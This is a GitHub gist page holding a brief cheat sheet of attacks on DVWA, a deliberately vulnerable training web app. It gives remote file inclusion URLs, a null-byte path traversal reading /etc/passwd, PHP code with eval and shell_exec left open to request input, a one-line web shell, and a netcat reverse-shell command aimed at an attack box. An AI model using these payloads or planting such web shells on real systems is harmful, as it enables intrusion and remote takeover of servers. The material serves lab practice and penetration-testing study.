AvasDream/dvwaCheatsheet.md

Last active May 24, 2018 12:47

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/AvasDream/f5bc9dfc376e224d09340caba8412d02.js"></script>
Save AvasDream/f5bc9dfc376e224d09340caba8412d02 to your computer and use it in GitHub Desktop.

DVWA vulnerabilities cheatsheet

Raw

Remote file inclusion

URL: /dvwa/vulnerabilities/fi/?page= [YOUR REMOTE URL]

Condition in /etc/php5/cgi/php.ini:

allow_url_fopen = On
allow_url_include = On

Sometimes you need the NULL-Terminator (%00):

http://website/page=../../../etc/passwd%00

URL: /rce.php?code=[PHP CODE HERE]

Vulnerable Code:

<?php 
$code = $_GET['code'];
eval($code); 
?>

Example:

/rce.php?code=echo shell_exec('/sbin/ifconfig eth0');

Use Case:

access to Wordpress Backend to code execution

Vulnerable Code:

<?php
echo shell_exec($_GET['cmd']); 
?>

URL:

/webshell.php?cmd=[COMMAND HERE]

Example:

/?cmd=nc [IP attack box] [port] -e /bin/sh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment